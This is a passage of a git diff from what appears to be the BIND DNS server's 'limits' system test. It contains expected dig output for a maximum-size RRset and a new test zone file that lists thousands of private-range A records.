10.0.15.145 +a-maximum-rrset.example. 5M IN A 10.0.15.146 +a-maximum-rrset.example. 5M IN A 10.0.15.147 +a-maximum-rrset.example. 5M IN A 10.0.15.148 +a-maximum-rrset.example. 5M IN A 10.0.15.149 +a-maximum-rrset.example. 5M IN A 10.0.15.150 +a-maximum-rrset.example. 5M IN A 10.0.15.151 +a-maximum-rrset.example. 5M IN A 10.0.15.152 +a-maximum-rrset.example. 5M IN A 10.0.15.153 +a-maximum-rrset.example. 5M IN A 10.0.15.154 +a-maximum-rrset.example. 5M IN A 10.0.15.155 +a-maximum-rrset.example. 5M IN A 10.0.15.156 +a-maximum-rrset.example. 5M IN A 10.0.15.157 +a-maximum-rrset.example. 5M IN A 10.0.15.158 +a-maximum-rrset.example. 5M IN A 10.0.15.159 +a-maximum-rrset.example. 5M IN A 10.1.0.0 +a-maximum-rrset.example. 5M IN A 10.1.0.1 +a-maximum-rrset.example. 5M IN A 10.1.0.2 +a-maximum-rrset.example. 5M IN A 10.1.0.3 +a-maximum-rrset.example. 5M IN A 10.1.0.4 +a-maximum-rrset.example. 5M IN A 10.1.0.5 +a-maximum-rrset.example. 5M IN A 10.1.0.6 +a-maximum-rrset.example. 5M IN A 10.1.0.7 +a-maximum-rrset.example. 5M IN A 10.1.0.8 +a-maximum-rrset.example. 5M IN A 10.1.0.9 +a-maximum-rrset.example. 5M IN A 10.1.0.10 +a-maximum-rrset.example. 5M IN A 10.1.0.11 +a-maximum-rrset.example. 5M IN A 10.1.0.12 +a-maximum-rrset.example. 5M IN A 10.1.0.13 +a-maximum-rrset.example. 5M IN A 10.1.0.14 +a-maximum-rrset.example. 5M IN A 10.1.0.15 +a-maximum-rrset.example. 5M IN A 10.1.0.16 +a-maximum-rrset.example. 5M IN A 10.1.0.17 +a-maximum-rrset.example. 5M IN A 10.1.0.18 +a-maximum-rrset.example. 5M IN A 10.1.0.19 +a-maximum-rrset.example. 5M IN A 10.1.0.20 +a-maximum-rrset.example. 5M IN A 10.1.0.21 +a-maximum-rrset.example. 5M IN A 10.1.0.22 +a-maximum-rrset.example. 5M IN A 10.1.0.23 +a-maximum-rrset.example. 5M IN A 10.1.0.24 +a-maximum-rrset.example. 5M IN A 10.1.0.25 +a-maximum-rrset.example. 5M IN A 10.1.0.26 +a-maximum-rrset.example. 5M IN A 10.1.0.27 +a-maximum-rrset.example. 5M IN A 10.1.0.28 +a-maximum-rrset.example. 5M IN A 10.1.0.29 +a-maximum-rrset.example. 5M IN A 10.1.0.30 +a-maximum-rrset.example. 5M IN A 10.1.0.31 +a-maximum-rrset.example. 5M IN A 10.1.0.32 +a-maximum-rrset.example. 5M IN A 10.1.0.33 +a-maximum-rrset.example. 5M IN A 10.1.0.34 +a-maximum-rrset.example. 5M IN A 10.1.0.35 +a-maximum-rrset.example. 5M IN A 10.1.0.36 +a-maximum-rrset.example. 5M IN A 10.1.0.37 +a-maximum-rrset.example. 5M IN A 10.1.0.38 +a-maximum-rrset.example. 5M IN A 10.1.0.39 +a-maximum-rrset.example. 5M IN A 10.1.0.40 +a-maximum-rrset.example. 5M IN A 10.1.0.41 +a-maximum-rrset.example. 5M IN A 10.1.0.42 +a-maximum-rrset.example. 5M IN A 10.1.0.43 +a-maximum-rrset.example. 5M IN A 10.1.0.44 +a-maximum-rrset.example. 5M IN A 10.1.0.45 +a-maximum-rrset.example. 5M IN A 10.1.0.46 +a-maximum-rrset.example. 5M IN A 10.1.0.47 +a-maximum-rrset.example. 5M IN A 10.1.0.48 +a-maximum-rrset.example. 5M IN A 10.1.0.49 +a-maximum-rrset.example. 5M IN A 10.1.0.50 +a-maximum-rrset.example. 5M IN A 10.1.0.51 +a-maximum-rrset.example. 5M IN A 10.1.0.52 +a-maximum-rrset.example. 5M IN A 10.1.0.53 +a-maximum-rrset.example. 5M IN A 10.1.0.54 +a-maximum-rrset.example. 5M IN A 10.1.0.55 +a-maximum-rrset.example. 5M IN A 10.1.0.56 +a-maximum-rrset.example. 5M IN A 10.1.0.57 +a-maximum-rrset.example. 5M IN A 10.1.0.58 +a-maximum-rrset.example. 5M IN A 10.1.0.59 +a-maximum-rrset.example. 5M IN A 10.1.0.60 +a-maximum-rrset.example. 5M IN A 10.1.0.61 +a-maximum-rrset.example. 5M IN A 10.1.0.62 +a-maximum-rrset.example. 5M IN A 10.1.0.63 +a-maximum-rrset.example. 5M IN A 10.1.0.64 +a-maximum-rrset.example. 5M IN A 10.1.0.65 +a-maximum-rrset.example. 5M IN A 10.1.0.66 +a-maximum-rrset.example. 5M IN A 10.1.0.67 +a-maximum-rrset.example. 5M IN A 10.1.0.68 +a-maximum-rrset.example. 5M IN A 10.1.0.69 +a-maximum-rrset.example. 5M IN A 10.1.0.70 +a-maximum-rrset.example. 5M IN A 10.1.0.71 +a-maximum-rrset.example. 5M IN A 10.1.0.72 +a-maximum-rrset.example. 5M IN A 10.1.0.73 +a-maximum-rrset.example. 5M IN A 10.1.0.74 +a-maximum-rrset.example. 5M IN A 10.1.0.75 +a-maximum-rrset.example. 5M IN A 10.1.0.76 +a-maximum-rrset.example. 5M IN A 10.1.0.77 +a-maximum-rrset.example. 5M IN A 10.1.0.78 +a-maximum-rrset.example. 5M IN A 10.1.0.79 +a-maximum-rrset.example. 5M IN A 10.1.0.80 +a-maximum-rrset.example. 5M IN A 10.1.0.81 +a-maximum-rrset.example. 5M IN A 10.1.0.82 +a-maximum-rrset.example. 5M IN A 10.1.0.83 +a-maximum-rrset.example. 5M IN A 10.1.0.84 +a-maximum-rrset.example. 5M IN A 10.1.0.85 +a-maximum-rrset.example. 5M IN A 10.1.0.86 +a-maximum-rrset.example. 5M IN A 10.1.0.87 +a-maximum-rrset.example. 5M IN A 10.1.0.88 +a-maximum-rrset.example. 5M IN A 10.1.0.89 +a-maximum-rrset.example. 5M IN A 10.1.0.90 + +;; AUTHORITY SECTION: +example. 5M IN NS ns1.example. + +;; ADDITIONAL SECTION: +ns1.example. 5M IN A 10.53.0.1 + +;; Total query time: 308 msec +;; FROM: draco to SERVER: 10.53.0.1 +;; WHEN: Fri Jun 23 12:58:22 2000 +;; MSG SIZE sent: 41 rcvd: 65535 + diff --git a/bin/tests/system/limits/ns1/example.db b/bin/tests/system/limits/ns1/example.db new file mode 100644 index 0000000..8998018 --- /dev/null +++ b/bin/tests/system/limits/ns1/example.db @@ -0,0 +1,19112 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns1.example. hostmaster.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns1.example. +ns1 A 10.53.0.1 +1000 A 10.0.0.0 + A 10.0.0.1 + A 10.0.0.2 + A 10.0.0.3 + A 10.0.0.4 + A 10.0.0.5 + A 10.0.0.6 + A 10.0.0.7 + A 10.0.0.8 + A 10.0.0.9 + A 10.0.0.10 + A 10.0.0.11 + A 10.0.0.12 + A 10.0.0.13 + A 10.0.0.14 + A 10.0.0.15 + A 10.0.0.16 + A 10.0.0.17 + A 10.0.0.18 + A 10.0.0.19 + A 10.0.0.20 + A 10.0.0.21 + A 10.0.0.22 + A 10.0.0.23 + A 10.0.0.24 + A 10.0.0.25 + A 10.0.0.26 + A 10.0.0.27 + A 10.0.0.28 + A 10.0.0.29 + A 10.0.0.30 + A 10.0.0.31 + A 10.0.0.32 + A 10.0.0.33 + A 10.0.0.34 + A 10.0.0.35 + A 10.0.0.36 + A 10.0.0.37 + A 10.0.0.38 + A 10.0.0.39 + A 10.0.0.40 + A 10.0.0.41 + A 10.0.0.42 + A 10.0.0.43 + A 10.0.0.44 + A 10.0.0.45 + A 10.0.0.46 + A 10.0.0.47 + A 10.0.0.48 + A 10.0.0.49 + A 10.0.0.50 + A 10.0.0.51 + A 10.0.0.52 + A 10.0.0.53 + A 10.0.0.54 + A 10.0.0.55 + A 10.0.0.56 + A 10.0.0.57 + A 10.0.0.58 + A 10.0.0.59 + A 10.0.0.60 + A 10.0.0.61 + A 10.0.0.62 + A 10.0.0.63 + A 10.0.0.64 + A 10.0.0.65 + A 10.0.0.66 + A 10.0.0.67 + A 10.0.0.68 + A 10.0.0.69 + A 10.0.0.70 + A 10.0.0.71 + A 10.0.0.72 + A 10.0.0.73 + A 10.0.0.74 + A 10.0.0.75 + A 10.0.0.76 + A 10.0.0.77 + A 10.0.0.78 + A 10.0.0.79 + A 10.0.0.80 + A 10.0.0.81 + A 10.0.0.82 + A 10.0.0.83 + A 10.0.0.84 + A 10.0.0.85 + A 10.0.0.86 + A 10.0.0.87 + A 10.0.0.88 + A 10.0.0.89 + A 10.0.0.90 + A 10.0.0.91 + A 10.0.0.92 + A 10.0.0.93 + A 10.0.0.94 + A 10.0.0.95 + A 10.0.0.96 + A 10.0.0.97 + A 10.0.0.98 + A 10.0.0.99 + A 10.0.0.100 + A 10.0.0.101 + A 10.0.0.102 + A 10.0.0.103 + A 10.0.0.104 + A 10.0.0.105 + A 10.0.0.106 + A 10.0.0.107 + A 10.0.0.108 + A 10.0.0.109 + A 10.0.0.110 + A 10.0.0.111 + A 10.0.0.112 + A 10.0.0.113 + A 10.0.0.114 + A 10.0.0.115 + A 10.0.0.116 + A 10.0.0.117 + A 10.0.0.118 + A 10.0.0.119 + A 10.0.0.120 + A 10.0.0.121 + A 10.0.0.122 + A 10.0.0.123 + A 10.0.0.124 + A 10.0.0.125 + A 10.0.0.126 + A 10.0.0.127 + A 10.0.0.128 + A 10.0.0.129 + A 10.0.0.130 + A 10.0.0.131 + A 10.0.0.132 + A 10.0.0.133 + A 10.0.0.134 + A 10.0.0.135 + A 10.0.0.136 + A 10.0.0.137 + A 10.0.0.138 + A 10.0.0.139 + A 10.0.0.140 + A 10.0.0.141 + A 10.0.0.142 + A 10.0.0.143 + A 10.0.0.144 + A 10.0.0.145 + A 10.0.0.146 + A 10.0.0.147 + A 10.0.0.148 + A 10.0.0.149 + A 10.0.0.150 + A 10.0.0.151 + A 10.0.0.152 + A 10.0.0.153 + A 10.0.0.154 + A 10.0.0.155 + A 10.0.0.156 + A 10.0.0.157 + A 10.0.0.158 + A 10.0.0.159 + A 10.0.0.160 + A 10.0.0.161 + A 10.0.0.162 + A 10.0.0.163 + A 10.0.0.164 + A 10.0.0.165 + A 10.0.0.166 + A 10.0.0.167 + A 10.0.0.168 + A 10.0.0.169 + A 10.0.0.170 + A 10.0.0.171 + A 10.0.0.172 + A 10.0.0.173 + A 10.0.0.174 + A 10.0.0.175 + A 10.0.0.176 + A 10.0.0.177 + A 10.0.0.178 + A 10.0.0.179 + A 10.0.0.180 + A 10.0.0.181 + A 10.0.0.182 + A 10.0.0.183 + A 10.0.0.184 + A 10.0.0.185 + A 10.0.0.186 + A 10.0.0.187 + A 10.0.0.188 + A 10.0.0.189 + A 10.0.0.190 + A 10.0.0.191 + A 10.0.0.192 + A 10.0.0.193 + A 10.0.0.194 + A 10.0.0.195 + A 10.0.0.196 + A 10.0.0.197 + A 10.0.0.198 + A 10.0.0.199 + A 10.0.0.200 + A 10.0.0.201 + A 10.0.0.202 + A 10.0.0.203 + A 10.0.0.204 + A 10.0.0.205 + A 10.0.0.206 + A 10.0.0.207 + A 10.0.0.208 + A 10.0.0.209 + A 10.0.0.210 + A 10.0.0.211 + A 10.0.0.212 + A 10.0.0.213 + A 10.0.0.214 + A 10.0.0.215 + A 10.0.0.216 + A 10.0.0.217 + A 10.0.0.218 + A 10.0.0.219 + A 10.0.0.220 + A 10.0.0.221 + A 10.0.0.222 + A 10.0.0.223 + A 10.0.0.224 + A 10.0.0.225 + A 10.0.0.226 + A 10.0.0.227 + A 10.0.0.228 + A 10.0.0.229 + A 10.0.0.230 + A 10.0.0.231 + A 10.0.0.232 + A 10.0.0.233 + A 10.0.0.234 + A 10.0.0.235 + A 10.0.0.236 + A 10.0.0.237 + A 10.0.0.238 + A 10.0.0.239 + A 10.0.0.240 + A 10.0.0.241 + A 10.0.0.242 + A 10.0.0.243 + A 10.0.0.244 + A 10.0.0.245 + A 10.0.0.246 + A 10.0.0.247 + A 10.0.0.248 + A 10.0.0.249 + A 10.0.0.250 + A 10.0.0.251 + A 10.0.0.252 + A 10.0.0.253 + A 10.0.0.254 + A 10.0.0.255 + A 10.0.1.0 + A 10.0.1.1 + A 10.0.1.2 + A 10.0.1.3 + A 10.0.1.4 + A 10.0.1.5 + A 10.0.1.6 + A 10.0.1.7 + A 10.0.1.8 + A 10.0.1.9 + A 10.0.1.10 + A 10.0.1.11 + A 10.0.1.12 + A 10.0.1.13 + A 10.0.1.14 + A 10.0.1.15 + A 10.0.1.16 + A 10.0.1.17 + A 10.0.1.18 + A 10.0.1.19 + A 10.0.1.20 + A 10.0.1.21 + A 10.0.1.22 + A 10.0.1.23 + A 10.0.1.24 + A 10.0.1.25 + A 10.0.1.26 + A 10.0.1.27 + A 10.0.1.28 + A 10.0.1.29 + A 10.0.1.30 + A 10.0.1.31 + A 10.0.1.32 + A 10.0.1.33 + A 10.0.1.34 + A 10.0.1.35 + A 10.0.1.36 + A 10.0.1.37 + A 10.0.1.38 + A 10.0.1.39 + A 10.0.1.40 + A 10.0.1.41 + A 10.0.1.42 + A 10.0.1.43 + A 10.0.1.44 + A 10.0.1.45 + A 10.0.1.46 + A 10.0.1.47 + A 10.0.1.48 + A 10.0.1.49 + A 10.0.1.50 + A 10.0.1.51 + A 10.0.1.52 + A 10.0.1.53 + A 10.0.1.54 + A 10.0.1.55 + A 10.0.1.56 + A 10.0.1.57 + A 10.0.1.58 + A 10.0.1.59 + A 10.0.1.60 + A 10.0.1.61 + A 10.0.1.62 + A 10.0.1.63 + A 10.0.1.64 + A 10.0.1.65 + A 10.0.1.66 + A 10.0.1.67 + A 10.0.1.68 + A 10.0.1.69 + A 10.0.1.70 + A 10.0.1.71 + A 10.0.1.72 + A 10.0.1.73 + A 10.0.1.74 + A 10.0.1.75 + A 10.0.1.76 + A 10.0.1.77 + A 10.0.1.78 + A 10.0.1.79 + A 10.0.1.80 + A 10.0.1.81 + A 10.0.1.82 + A 10.0.1.83 + A 10.0.1.84 + A 10.0.1.85 + A 10.0.1.86 + A 10.0.1.87 + A 10.0.1.88 + A 10.0.1.89 + A 10.0.1.90 + A 10.0.1.91 + A 10.0.1.92 + A 10.0.1.93 + A 10.0.1.94 + A 10.0.1.95 + A 10.0.1.96 + A 10.0.1.97 + A 10.0.1.98 + A 10.0.1.99 + A 10.0.1.100 + A 10.0.1.101 + A 10.0.1.102 + A 10.0.1.103 + A 10.0.1.104 + A 10.0.1.105 + A 10.0.1.106 + A 10.0.1.107 + A 10.0.1.108 + A 10.0.1.109 + A 10.0.1.110 + A 10.0.1.111 + A 10.0.1.112 + A 10.0.1.113 + A 10.0.1.114 + A 10.0.1.115 + A 10.0.1.116 + A 10.0.1.117 + A 10.0.1.118 + A 10.0.1.119 + A 10.0.1.120 + A 10.0.1.121 + A 10.0.1.122 + A 10.0.1.123 + A 10.0.1.124 + A 10.0.1.125 + A 10.0.1.126 + A 10.0.1.127 + A 10.0.1.128 + A 10.0.1.129 + A 10.0.1.130 + A 10.0.1.131 + A 10.0.1.132 + A 10.0.1.133 + A 10.0.1.134 + A 10.0.1.135 + A 10.0.1.136 + A 10.0.1.137 + A 10.0.1.138 + A 10.0.1.139 + A 10.0.1.140 + A 10.0.1.141 + A 10.0.1.142 + A 10.0.1.143 + A 10.0.1.144 + A 10.0.1.145 + A 10.0.1.146 + A 10.0.1.147 + A 10.0.1.148 + A 10.0.1.149 + A 10.0.1.150 + A 10.0.1.151 + A 10.0.1.152 + A 10.0.1.153 + A 10.0.1.154 + A 10.0.1.155 + A 10.0.1.156 + A 10.0.1.157 + A 10.0.1.158 + A 10.0.1.159 + A 10.0.1.160 + A 10.0.1.161 + A 10.0.1.162 + A 10.0.1.163 + A 10.0.1.164 + A 10.0.1.165 + A 10.0.1.166 + A 10.0.1.167 + A 10.0.1.168 + A 10.0.1.169 + A 10.0.1.170 + A 10.0.1.171 + A 10.0.1.172 + A 10.0.1.173 + A 10.0.1.174 + A 10.0.1.175 + A 10.0.1.176 + A 10.0.1.177 + A 10.0.1.178 + A 10.0.1.179 + A 10.0.1.180 + A 10.0.1.181 + A 10.0.1.182 + A 10.0.1.183 + A 10.0.1.184 + A 10.0.1.185 + A 10.0.1.186 + A 10.0.1.187 + A 10.0.1.188 + A 10.0.1.189 + A 10.0.1.190 + A 10.0.1.191 + A 10.0.1.192 + A 10.0.1.193 + A 10.0.1.194 + A 10.0.1.195 + A 10.0.1.196 + A 10.0.1.197 + A 10.0.1.198 + A 10.0.1.199 + A 10.0.1.200 + A 10.0.1.201 + A 10.0.1.202 + A 10.0.1.203 + A 10.0.1.204 + A 10.0.1.205 + A 10.0.1.206 + A 10.0.1.207 + A 10.0.1.208 + A 10.0.1.209 + A 10.0.1.210 + A 10.0.1.211 + A 10.0.1.212 + A 10.0.1.213 + A 10.0.1.214 + A 10.0.1.215 + A 10.0.1.216 + A 10.0.1.217 + A 10.0.1.218 + A 10.0.1.219 + A 10.0.1.220 + A 10.0.1.221 + A 10.0.1.222 + A 10.0.1.223 + A 10.0.1.224 + A 10.0.1.225 + A 10.0.1.226 + A 10.0.1.227 + A 10.0.1.228 + A 10.0.1.229 + A 10.0.1.230 + A 10.0.1.231 + A 10.0.1.232 + A 10.0.1.233 + A 10.0.1.234 + A 10.0.1.235 + A 10.0.1.236 + A 10.0.1.237 + A 10.0.1.238 + A 10.0.1.239 + A 10.0.1.240 + A 10.0.1.241 + A 10.0.1.242 + A 10.0.1.243 + A 10.0.1.244 + A 10.0.1.245 + A 10.0.1.246 + A 10.0.1.247 + A 10.0.1.248 + A 10.0.1.249 + A 10.0.1.250 + A 10.0.1.251 + A 10.0.1.252 + A 10.0.1.253 + A 10.0.1.254 + A 10.0.1.255 + A 10.0.2.0 + A 10.0.2.1 + A 10.0.2.2 + A 10.0.2.3 + A 10.0.2.4 + A 10.0.2.5 + A 10.0.2.6 + A 10.0.2.7 + A 10.0.2.8 + A 10.0.2.9 + A 10.0.2.10 + A 10.0.2.11 + A 10.0.2.12 + A 10.0.2.13 + A 10.0.2.14 + A 10.0.2.15 + A 10.0.2.16 + A 10.0.2.17 + A 10.0.2.18 + A 10.0.2.19 + A 10.0.2.20 + A 10.0.2.21 + A 10.0.2.22 + A 10.0.2.23 + A 10.0.2.24 + A 10.0.2.25 + A 10.0.2.26 + A 10.0.2.27 + A 10.0.2.28 + A 10.0.2.29 + A 10.0.2.30 + A 10.0.2.31 + A 10.0.2.32 + A 10.0.2.33 + A 10.0.2.34 + A 10.0.2.35 + A 10.0.2.36 + A 10.0.2.37 + A 10.0.2.38 + A 10.0.2.39 + A 10.0.2.40 + A 10.0.2.41 + A 10.0.2.42 + A 10.0.2.43 + A 10.0.2.44 + A 10.0.2.45 + A 10.0.2.46 + A 10.0.2.47 + A 10.0.2.48 + A 10.0.2.49 + A 10.0.2.50 + A 10.0.2.51 + A 10.0.2.52 + A 10.0.2.53 + A 10.0.2.54 + A 10.0.2.55 + A 10.0.2.56 + A 10.0.2.57 + A 10.0.2.58 + A 10.0.2.59 + A 10.0.2.60 + A 10.0.2.61 + A 10.0.2.62 + A 10.0.2.63 + A 10.0.2.64 + A 10.0.2.65 + A 10.0.2.66 + A 10.0.2.67 + A 10.0.2.68 + A 10.0.2.69 + A 10.0.2.70 + A 10.0.2.71 + A 10.0.2.72 + A 10.0.2.73 + A 10.0.2.74 + A 10.0.2.75 + A 10.0.2.76 + A 10.0.2.77 + A 10.0.2.78 + A 10.0.2.79 + A 10.0.2.80 + A 10.0.2.81 + A 10.0.2.82 + A 10.0.2.83 + A 10.0.2.84 + A 10.0.2.85 + A 10.0.2.86 + A 10.0.2.87 + A 10.0.2.88 + A 10.0.2.89 + A 10.0.2.90 + A 10.0.2.91 + A 10.0.2.92 + A 10.0.2.93 + A 10.0.2.94 + A 10.0.2.95 + A 10.0.2.96 + A 10.0.2.97 + A 10.0.2.98 + A 10.0.2.99 + A 10.0.2.100 + A 10.0.2.101 + A 10.0.2.102 + A 10.0.2.103 + A 10.0.2.104 + A 10.0.2.105 + A 10.0.2.106 + A 10.0.2.107 + A 10.0.2.108 + A 10.0.2.109 + A 10.0.2.110 + A 10.0.2.111 + A 10.0.2.112 + A 10.0.2.113 + A 10.0.2.114 + A 10.0.2.115 + A 10.0.2.116 + A 10.0.2.117 + A 10.0.2.118 + A 10.0.2.119 + A 10.0.2.120 + A 10.0.2.121 + A 10.0.2.122 + A 10.0.2.123 + A 10.0.2.124 + A 10.0.2.125 + A 10.0.2.126 + A 10.0.2.127 + A 10.0.2.128 + A 10.0.2.129 + A 10.0.2.130 + A 10.0.2.131 + A 10.0.2.132 + A 10.0.2.133 + A 10.0.2.134 + A 10.0.2.135 + A 10.0.2.136 + A 10.0.2.137 + A 10.0.2.138 + A 10.0.2.139 + A 10.0.2.140 + A 10.0.2.141 + A 10.0.2.142 + A 10.0.2.143 + A 10.0.2.144 + A 10.0.2.145 + A 10.0.2.146 + A 10.0.2.147 + A 10.0.2.148 + A 10.0.2.149 + A 10.0.2.150 + A 10.0.2.151 + A 10.0.2.152 + A 10.0.2.153 + A 10.0.2.154 + A 10.0.2.155 + A 10.0.2.156 + A 10.0.2.157 + A 10.0.2.158 + A 10.0.2.159 + A 10.0.2.160 + A 10.0.2.161 + A 10.0.2.162 + A 10.0.2.163 + A 10.0.2.164 + A 10.0.2.165 + A 10.0.2.166 + A 10.0.2.167 + A 10.0.2.168 + A 10.0.2.169 + A 10.0.2.170 + A 10.0.2.171 + A 10.0.2.172 + A 10.0.2.173 + A 10.0.2.174 + A 10.0.2.175 + A 10.0.2.176 + A 10.0.2.177 + A 10.0.2.178 + A 10.0.2.179 + A 10.0.2.180 + A 10.0.2.181 + A 10.0.2.182 + A 10.0.2.183 + A 10.0.2.184 + A 10.0.2.185 + A 10.0.2.186 + A 10.0.2.187 + A 10.0.2.188 + A 10.0.2.189 + A 10.0.2.190 + A 10.0.2.191 + A 10.0.2.192 + A 10.0.2.193 + A 10.0.2.194 + A 10.0.2.195 + A 10.0.2.196 + A 10.0.2.197 + A 10.0.2.198 + A 10.0.2.199 + A 10.0.2.200 + A 10.0.2.201 + A 10.0.2.202 + A 10.0.2.203 + A 10.0.2.204 + A 10.0.2.205 + A 10.0.2.206 + A 10.0.2.207 + A 10.0.2.208 + A 10.0.2.209 + A 10.0.2.210 + A 10.0.2.211 + A 10.0.2.212 + A 10.0.2.213 + A 10.0.2.214 + A 10.0.2.215 + A 10.0.2.216 + A 10.0.2.217 + A 10.0.2.218 + A 10.0.2.219 + A 10.0.2.220 + A 10.0.2.221 + A 10.0.2.222 + A 10.0.2.223 + A 10.0.2.224 + A 10.0.2.225 + A 10.0.2.226 + A 10.0.2.227 + A 10.0.2.228 + A 10.0.2.229 + A 10.0.2.230 + A 10.0.2.231 + A 10.0.2.232 + A 10.0.2.233 + A 10.0.2.234 + A 10.0.2.235 + A 10.0.2.236 + A 10.0.2.237 + A 10.0.2.238 + A 10.0.2.239 + A 10.0.2.240 + A 10.0.2.241 + A 10.0.2.242 + A 10.0.2.243 + A 10.0.2.244 + A 10.0.2.245 + A 10.0.2.246 + A 10.0.2.247 + A 10.0.2.248 + A 10.0.2.249 + A 10.0.2.250 + A 10.0.2.251 + A 10.0.2.252 + A 10.0.2.253 + A 10.0.2.254 + A 10.0.2.255 + A 10.0.3.0 + A 10.0.3.1 + A 10.0.3.2 + A 10.0.3.3 + A 10.0.3.4 + A 10.0.3.5 + A 10.0.3.6 + A 10.0.3.7 + A 10.0.3.8 + A 10.0.3.9 + A 10.0.3.10 + A 10.0.3.11 + A 10.0.3.12 + A 10.0.3.13 + A 10.0.3.14 + A 10.0.3.15 + A 10.0.3.16 + A 10.0.3.17 + A 10.0.3.18 + A 10.0.3.19 + A 10.0.3.20 + A 10.0.3.21 + A 10.0.3.22 + A 10.0.3.23 + A 10.0.3.24 + A 10.0.3.25 + A 10.0.3.26 + A 10.0.3.27 + A 10.0.3.28 + A 10.0.3.29 + A 10.0.3.30 + A 10.0.3.31 + A 10.0.3.32 + A 10.0.3.33 + A 10.0.3.34 + A 10.0.3.35 + A 10.0.3.36 + A 10.0.3.37 + A 10.0.3.38 + A 10.0.3.39 + A 10.0.3.40 + A 10.0.3.41 + A 10.0.3.42 + A 10.0.3.43 + A 10.0.3.44 + A 10.0.3.45 + A 10.0.3.46 + A 10.0.3.47 + A 10.0.3.48 + A 10.0.3.49 + A 10.0.3.50 + A 10.0.3.51 + A 10.0.3.52 + A 10.0.3.53 + A 10.0.3.54 + A 10.0.3.55 + A 10.0.3.56 + A 10.0.3.57 + A 10.0.3.58 + A 10.0.3.59 + A 10.0.3.60 + A 10.0.3.61 + A 10.0.3.62 + A 10.0.3.63 + A 10.0.3.64 + A 10.0.3.65 + A 10.0.3.66 + A 10.0.3.67 + A 10.0.3.68 + A 10.0.3.69 + A 10.0.3.70 + A 10.0.3.71 + A 10.0.3.72 + A 10.0.3.73 + A 10.0.3.74 + A 10.0.3.75 + A 10.0.3.76 + A 10.0.3.77 + A 10.0.3.78 + A 10.0.3.79 + A 10.0.3.80 + A 10.0.3.81 + A 10.0.3.82 + A 10.0.3.83 + A 10.0.3.84 + A 10.0.3.85 + A 10.0.3.86 + A 10.0.3.87 + A 10.0.3.88 + A 10.0.3.89 + A 10.0.3.90 + A 10.0.3.91 + A 10.0.3.92 + A 10.0.3.93 + A 10.0.3.94 + A 10.0.3.95 + A 10.0.3.96 + A 10.0.3.97 + A 10.0.3.98 + A 10.0.3.99 + A 10.0.3.100 + A 10.0.3.101 + A 10.0.3.102 + A 10.0.3.103 + A 10.0.3.104 + A 10.0.3.105 + A 10.0.3.106 + A 10.0.3.107 + A 10.0.3.108 + A 10.0.3.109 + A 10.0.3.110 + A 10.0.3.111 + A 10.0.3.112 + A 10.0.3.113 + A 10.0.3.114 + A 10.0.3.115 + A 10.0.3.116 + A 10.0.3.117 + A 10.0.3.118 + A 10.0.3.119 + A 10.0.3.120 + A 10.0.3.121 + A 10.0.3.122 + A 10.0.3.123 + A 10.0.3.124 + A 10.0.3.125 + A 10.0.3.126 + A 10.0.3.127 + A 10.0.3.128 + A 10.0.3.129 + A 10.0.3.130 + A 10.0.3.131 + A 10.0.3.132 + A 10.0.3.133 + A 10.0.3.134 + A 10.0.3.135 + A 10.0.3.136 + A 10.0.3.137 + A 10.0.3.138 + A 10.0.3.139 + A 10.0.3.140 + A 10.0.3.141 + A 10.0.3.142 + A 10.0.3.143 + A 10.0.3.144 + A 10.0.3.145 + A 10.0.3.146 + A 10.0.3.147 + A 10.0.3.148 + A 10.0.3.149 + A 10.0.3.150 + A 10.0.3.151 + A 10.0.3.152 + A 10.0.3.153 + A 10.0.3.154 + A 10.0.3.155 + A 10.0.3.156 + A 10.0.3.157 + A 10.0.3.158 + A 10.0.3.159 + A 10.0.3.160 + A 10.0.3.161 + A 10.0.3.162 + A 10.0.3.163 + A 10.0.3.164 + A 10.0.3.165 + A 10.0.3.166 + A 10.0.3.167 + A 10.0.3.168 + A 10.0.3.169 + A 10.0.3.170 + A 10.0.3.171 + A 10.0.3.172 + A 10.0.3.173 + A 10.0.3.174 + A 10.0.3.175 + A 10.0.3.176 + A 10.0.3.177 + A 10.0.3.178 + A 10.0.3.179 + A 10.0.3.180 + A 10.0.3.181 + A 10.0.3.182 + A 10.0.3.183 + A 10.0.3.184 + A 10.0.3.185 + A 10.0.3.186 + A 10.0.3.187 + A 10.0.3.188 + A 10.0.3.189 + A 10.0.3.190 + A 10.0.3.191 + A 10.0.3.192 + A 10.0.3.193 + A 10.0.3.194 + A 10.0.3.195 + A 10.0.3.196 + A 10.0.3.197 + A 10.0.3.198 + A 10.0.3.199 + A 10.0.3.200 + A 10.0.3.201 + A 10.0.3.202 + A 10.0.3.203 + A 10.0.3.204 + A 10.0.3.205 + A 10.0.3.206 + A 10.0.3.207 + A 10.0.3.208 + A 10.0.3.209 + A 10.0.3.210 + A 10.0.3.211 + A 10.0.3.212 + A 10.0.3.213 + A 10.0.3.214 + A 10.0.3.215 + A 10.0.3.216 + A 10.0.3.217 + A 10.0.3.218 + A 10.0.3.219 + A 10.0.3.220 + A 10.0.3.221 + A 10.0.3.222 + A 10.0.3.223 + A 10.0.3.224 + A 10.0.3.225 + A 10.0.3.226 + A 10.0.3.227 + A 10.0.3.228 + A 10.0.3.229 + A 10.0.3.230 + A 10.0.3.231 +2000 A 10.0.0.0 + A 10.0.0.1 + A 10.0.0.2 + A 10.0.0.3 + A 10.0.0.4 + A 10.0.0.5 + A 10.0.0.6 + A 10.0.0.7 + A 10.0.0.8 + A 10.0.0.9 + A 10.0.0.10 + A 10.0.0.11 + A 10.0.0.12 + A 10.0.0.13 + A 10.0.0.14 + A 10.0.0.15 + A 10.0.0.16 + A 10.0.0.17 + A 10.0.0.18 + A 10.0.0.19 + A 10.0.0.20 + A 10.0.0.21 + A 10.0.0.22 + A 10.0.0.23 + A 10.0.0.24 + A 10.0.0.25 + A 10.0.0.26 + A 10.0.0.27 + A 10.0.0.28 + A 10.0.0.29 + A 10.0.0.30 + A 10.0.0.31 + A 10.0.0.32 + A 10.0.0.33 + A 10.0.0.34 + A 10.0.0.35 + A 10.0.0.36 + A 10.0.0.37 + A 10.0.0.38 + A 10.0.0.39 + A 10.0.0.40 + A 